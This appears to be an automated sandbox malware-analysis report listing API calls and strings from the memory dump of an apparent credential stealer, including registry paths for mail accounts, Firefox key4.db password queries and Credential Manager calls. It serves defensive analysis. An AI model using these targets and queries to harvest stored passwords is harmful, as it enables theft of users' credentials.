                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy
                                                                                                                                                                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                          • API String ID: 714388716-318151290
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                          • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                          • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                            • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                            • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                            • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                          • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                          • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                          • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1416211542-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                          • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                          • API String ID: 2360744853-2229823034
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                            • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                            • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                          • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                          • API String ID: 1831126014-3814494228
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                            • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                            • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                            • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                            • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                          • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                          • String ID: \systemroot
                                                                                                                                                                                          • API String ID: 912701516-1821301763
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • key4.db, xrefs: 00406632
                                                                                                                                                                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                          • C@, xrefs: 00406625
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                          • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                          • API String ID: 2950547843-1835927508
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00403010
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • memset.MSVCRT ref: 0040305D
                                                                                                                                                                                          • sprintf.MSVCRT ref: 00403075
                                                                                                                                                                                          • memset.MSVCRT ref: 004030A6
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                          • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                          • API String ID: 3672803090-3168940695
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                          • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@$strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                            • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                          • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                          • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                          • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                          • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                          • String ID: J$Microsoft_WinInet
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                          • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                          • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                          • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                          • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FromStringUuid$memcpy
                                                                                                                                                                                          • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                          • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                          • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                          • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                          • API String ID: 2780580303-317687271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                            • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                                                          • database %s is already in use, xrefs: 0042E014
                                                                                                                                                                                          • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                                                          • database is already attached, xrefs: 0042E0DD
                                                                                                                                                                                          • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                                                          • out of memory, xrefs: 0042E235
                                                                                                                                                                                          • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                          • API String ID: 1297977491-2001300268
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                            • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                            • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                            • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                            • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                            • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                          • String ID: $$d
                                                                                                                                                                                          • API String ID: 2915808112-2066904009
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                          • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                            • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                            • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                          • memset.MSVCRT ref: 0040F396
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040F3AD
                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040F3C7
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F3F3
                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040F413
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 004101EF
                                                                                                                                                                                            • Part of subcall function 004101D8: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 004101FC
                                                                                                                                                                                            • Part of subcall function 004101D8: memcpy.MSVCRT ref: 00410238
                                                                                                                                                                                          • strchr.MSVCRT ref: 00403711
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040373A
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040374A
                                                                                                                                                                                          • strlen.MSVCRT ref: 0040376A
                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040378E
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004037A4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                          • API String ID: 500647785-4097000612
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00409239
                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 00409244
                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 00409257
                                                                                                                                                                                          • memset.MSVCRT ref: 0040927D
                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 00409290
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004092A2
                                                                                                                                                                                            • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
